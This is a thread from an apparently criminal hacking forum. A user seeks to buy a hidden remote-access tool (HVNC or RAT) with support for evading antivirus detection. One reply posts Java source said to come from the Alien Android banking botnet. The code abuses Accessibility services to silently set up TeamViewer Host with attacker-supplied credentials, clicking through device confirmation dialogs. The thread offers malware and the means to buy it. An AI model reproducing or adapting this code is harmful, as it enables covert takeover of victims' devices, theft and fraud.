• XSS.stack #1 – первый литературный журнал от юзеров форума

Нужен рабочий VHC or HVNC

В этой теме можно использовать автоматический гарант!

vista234

CD-диск
Забанен
Регистрация
08.12.2020
Сообщения
19
Реакции
-1
Пожалуйста, обратите внимание, что пользователь заблокирован
Нужен рабочий софт с функцией VHC, HVNC или скрытый RAT. Коннекты падать не должны. Только напрямую от кодера с поддержкой по чисткам и обновам. Без пруфов работы вашего софта обращаться не стоит. По цене договоримся. Контакт: @qunqa
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Мозгоёб... общались, сделал ему тест через эмми коннект всё показал , потом как только речь зашла о деньгах - ТС свалил в офф.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
La_Citrix, ты сам пропал, уже двое суток нету в телеге. О какой поддержке софта может идти речь...спрашивается)
 
if it for android the alien botnet source code might help you


Код:
 try {
    if (Build.VERSION.SDK_INT> = 18) {
        if (this.packageNameLow.contains ("com.teamviewer.host.market")) {
            AccessibilityNodeInfo tvUsername = A11yUtils.getById (eventLocal, "com.teamviewer.host.market:id/host_assign_device_username");
            AccessibilityNodeInfo tvPass = A11yUtils.getById (eventLocal, "com.teamviewer.host.market:id/host_assign_device_password");
            AccessibilityNodeInfo tvSubmit = A11yUtils.getById (eventLocal, "com.teamviewer.host.market:id/host_assign_device_submit_button");
            if (tvUsername! = null) {
                this.tvUser = this.utils.readPrefs (this, this.strings.RT);
                if (! this.tvUser.isEmpty ()) {
                    this.tvPass = this.utils.readPrefs (this, this.strings.RY);
                    this.isTvSubmitted = false;
                    this.isTvPassSet = false;
                    this.isTvUserSet = false;
                    this.tvStep = 0;
                    this.utils.writePrefs (this, this.strings.RT, "");
                    this.utils.writePrefs (this, this.strings.RY, "");
                }
            }

            if (this.tvStep == 0 && (A11yUtils.getById (eventLocal, "com.teamviewer.host.market:id/action_bar_root")! = null
               && A11yUtils.getById (eventLocal, "com.teamviewer.host.market:id/buttonPanel")! = Null)) {
                  
                this.tvStep = 1;
                AccessibilityNodeInfo btn1 = A11yUtils.getById (eventLocal, this.dec ("android: id / button1"));
                if (btn1! = null) {
                    this.a11y.clickButton (btn1);
                }

                AccessibilityNodeInfo checkBox1 = A11yUtils.getById (eventLocal, "com.samsung.klmsagent: id / checkBox1");
                AccessibilityNodeInfo btnConfirm = A11yUtils.getById (eventLocal, "com.samsung.klmsagent: id / btn_confirm");
                if (checkBox1! = null && this.tvStep == 1) {
                    this.a11y.clickButton (checkBox1);
                    this.a11y.clickButton (btnConfirm);
                    this.tvStep = 2;
                    Utils.start (this, "com.teamviewer.host.market");
                }
            }

            if (! this.tvUser.isEmpty () &&! this.tvPass.isEmpty ()) {
                if (tvUsername! = null &&! this.isTvUserSet) {
                    A11yUtils.setText (tvUsername, this.tvUser);
                    this.isTvUserSet = true;
                }

                if (tvPass! = null &&! this.isTvPassSet) {
                    A11yUtils.setText (tvPass, this.tvPass);
                    this.isTvPassSet = true;
                }

                if ((this.isTvUserSet) && (this.isTvPassSet) &&! this.isTvSubmitted) {
                    this.tvStep = 0;
                    this.a11y.clickButton (tvSubmit);
                    this.isTvSubmitted = true;
                    if (this.utils.readPrefs (this, this.strings.RI) .equals ("true")) {
                        this.backX2 ();
                    }
                }
            }
        }
        else if (this.packageNameLow.contains ("com.samsung.klmsagent")) {
            AccessibilityNodeInfo checkBox2 = A11yUtils.getById (eventLocal, "com.samsung.klmsagent: id / checkBox1");
            AccessibilityNodeInfo btnConfirm2 = A11yUtils.getById (eventLocal, "com.samsung.klmsagent: id / btn_confirm");
            if (checkBox2! = null && this.tvStep == 1) {
                this.a11y.clickButton (checkBox2);
                this.a11y.clickButton (btnConfirm2);
                this.tvStep = 2;
                Utils.start (this, "com.teamviewer.host.market");
            }
        }
        else {
            this.tvStep = 0;
        }

        if ((this.packageNameLow.contains ("com.teamviewer.host.market")) && (this.utils.readPrefs (this, this.strings.RA) .equals ("true"))) {
            this.backX2 ();
        }
    }
}
catch (Exception unused_ex) {
} [/ CODE]


Google for threatfabric it will help you a lot.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
VHC, HVNC
Если подойдет обычный vnc, зачем искать на блек форумах? Их полно в паблике, каких угодно.

По цене договоримся
бюджет обязательно надо указывать, хотя бы примерный.
 


Напишите ответ...
Верх